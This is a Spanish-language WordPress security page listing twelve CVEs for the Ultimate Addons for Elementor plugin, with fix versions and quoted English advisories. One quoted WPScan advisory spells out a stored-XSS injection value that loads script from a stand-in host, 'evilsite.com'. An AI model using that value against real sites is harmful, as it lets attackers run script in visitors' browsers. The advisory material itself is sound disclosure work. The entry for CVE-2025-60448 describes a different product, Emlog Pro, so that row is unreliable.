Vulnerabilidades conocidas, compatibilidad con PHP y alternativas más seguras para el plugin de WordPress Ultimate Addons for Elementor (UAE) — verificado contra la base de datos de seguridad local de WP Clinic.
Qué hace este plugin
- Slug:
header-footer-elementor
- 2000000+ instalaciones activas
elementorelementor addonselementor templateelementor widgetsheader footer builder
Estado de mantenimiento
- Última versión conocida: 2.9.1
- Requiere PHP: 7.4+
- PHP máximo soportado (analizado): 8.4
Vulnerabilidades conocidas
12 CVEs conocidos registrados para Ultimate Addons for Elementor (UAE).
| CVE |
Vulnerabilidad |
Tipo |
Gravedad |
Afectadas |
Corregido en |
Publicado |
Estado |
|
CVE-2025-60448
|
Ultimate Addons for Elementor [header-footer-elementor] < 2.5.0 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
6,1
|
< 2.5.0
|
2.5.0 |
2025-10-03 |
✓ corregido en la última versión
|
|
CVE-2024-11230
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.47 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
6,4
|
< 1.6.47
|
1.6.47 |
2024-12-22 |
✓ corregido en la última versión
|
|
CVE-2024-10325
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.46 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
6,4
|
< 1.6.46
|
1.6.46 |
2024-11-07 |
✓ corregido en la última versión
|
|
CVE-2024-10050
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.44 |
Exposición de información sensible a un actor no autorizado |
Media
4,3
|
< 1.6.44
|
1.6.44 |
2024-10-23 |
✓ corregido en la última versión
|
|
CVE-2024-33933
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.36 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
5,4
|
< 1.6.36
|
1.6.36 |
2024-07-01 |
✓ corregido en la última versión
|
|
CVE-2024-5757
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.36 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
5,4
|
< 1.6.36
|
1.6.36 |
2024-06-12 |
✓ corregido en la última versión
|
|
CVE-2024-2618
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.26.1 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
5,4
|
< 1.6.26.1
|
1.6.26.1 |
2024-05-23 |
✓ corregido en la última versión
|
|
CVE-2024-2619
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.27 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
5,4
|
< 1.6.27
|
1.6.27 |
2024-05-16 |
✓ corregido en la última versión
|
CVE-2025-60448
A stored Cross-Site Scripting (XSS) vulnerability has been discovered in Emlog Pro 2.5.19. The vulnerability exists due to insufficient validation of SVG file uploads in the /admin/media.php component, allowing attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
CVE.org
CVE-2024-11230
The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘size’ parameter in all versions up to, and including, 1.6.46 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
CVE.org
CVE-2024-10325
The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.6.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
CVE.org
CVE-2024-10050
The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 1.6.43 via the hfe_template shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to view the contents of Draft, Private and Password-protected posts they do not own.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
CVE.org
CVE-2024-33933
The Elementor – Header, Footer & Blocks Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
Wordfence
CVE-2024-5757
The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url attribute within the plugin's Site Title widget in all versions up to, and including, 1.6.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
CVE.org
CVE-2024-2618
The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the size attribute in all versions up to, and including, 1.6.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
CVE.org
CVE-2024-2619
The Elementor Header & Footer Builder for WordPress is vulnerable to HTML Injection in all versions up to, and including, 1.6.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary HTML in pages that will be shown whenever a user accesses an injected page.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
CVE.org
+ 6 vulnerabilidades conocidas más
| CVE |
Vulnerabilidad |
Tipo |
Gravedad |
Afectadas |
Corregido en |
Publicado |
Estado |
|
CVE-2024-4634
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.29 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
5,4
|
< 1.6.29
|
1.6.29 |
2024-05-15 |
✓ corregido en la última versión
|
|
CVE-2024-1237
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.6.25 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
5,4
|
< 1.6.25
|
1.6.25 |
2024-03-11 |
✓ corregido en la última versión
|
|
CVE-2021-24256
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.5.8 |
Neutralización incorrecta de la entrada al generar la página web (Cross-site Scripting / XSS) |
Media
5,4
|
< 1.5.8
|
1.5.8 |
2021-04-13 |
✓ corregido en la última versión
|
|
—
|
Ultimate Addons for Elementor [header-footer-elementor] < 1.5.8 |
— |
Desconocido
|
< 1.5.8
|
1.5.8 |
2021-04-13 |
✓ corregido en la última versión
|
|
CVE-2025-8488
|
Ultimate Addons for Elementor [header-footer-elementor] < 2.4.7 |
Falta de control de autorización |
Media
4,3
|
< 2.4.7
|
2.4.7 |
0000-00-00 |
✓ corregido en la última versión
|
|
—
|
Ultimate Addons for Elementor [header-footer-elementor] < 2.5.0 |
— |
Desconocido
|
< 2.5.0
|
2.5.0 |
0000-00-00 |
✓ corregido en la última versión
|
CVE-2024-4634
The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘hfe_svg_mime_types’ function in versions up to, and including, 1.6.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
CVE.org
CVE-2024-1237
Update the WordPress Elementor – Header, Footer & Blocks Template plugin to the latest available version (at least 1.6.25).
wesley (wcraft) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Elementor – Header, Footer & Blocks Template Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.6.25.
Have additional information or questions about this entry? Get in touch.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
Patchstack
CVE-2021-24256
The “Elementor – Header, Footer & Blocks Template” WordPress Plugin before 1.5.8 has two widgets that are vulnerable to stored Cross-Site Scripting (XSS) by lower-privileged users such as contributors, all via a similar method.
The “Page Title” widget accepts a “heading_tag” parameter. Although the element control lists a fixed set of possible html tags, it is possible to send a ‘save_builder’ request with the “heading_tag” set to “script”, and the actual page title set to JavaScript.
This JavaScript will then be executed when the saved page is viewed or previewed.
Alternatively, the “heading tag” can be set to “script” and the “size” parameter can be set to a remotely sourced script, e.g. “medium\" src=\"https://evilsite.com/alertscript.js”. The remotely hosted JavaScript will then be executed when the saved page is viewed or previewed.
The “Site Title” widget can likewise be exploited by setting the “heading_tag” parameter to “script” and the “size” parameter to a remotely sourced script - most attackers would not be able to manipulate the actual site title itself, but this might also be exploitable in a similar way to the page title.
These vulnerabilities are nearly identical to the vulnerabilities we have recently disclosed in the main Elementor plugin: https://www.wordfence.com/blog/2021/03/cross-site-scripting-vulnerabilities-in-elementor-impact-over-7-million-sites/
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
WPScan
CVE-2025-8488
The Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_hfe_compatibility_option_callback ()function in all versions up to, and including, 2.4.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the compatibility option setting.
Descripción técnica mostrada en el idioma original de la fuente (inglés).
Fuente:
Wordfence
Cómo solucionarlo
Mantén Ultimate Addons for Elementor (UAE) actualizado — 2.9.1 es la última versión en wordpress.org, y cada CVE de arriba indica la versión exacta que lo corrigió ("Corregido en").
Este es el historial completo de vulnerabilidades conocidas del plugin, no un escaneo de una instalación específica — ejecuta un escaneo gratis de tu propio sitio para verificar tu versión instalada exacta.
Alternativas más seguras / más establecidas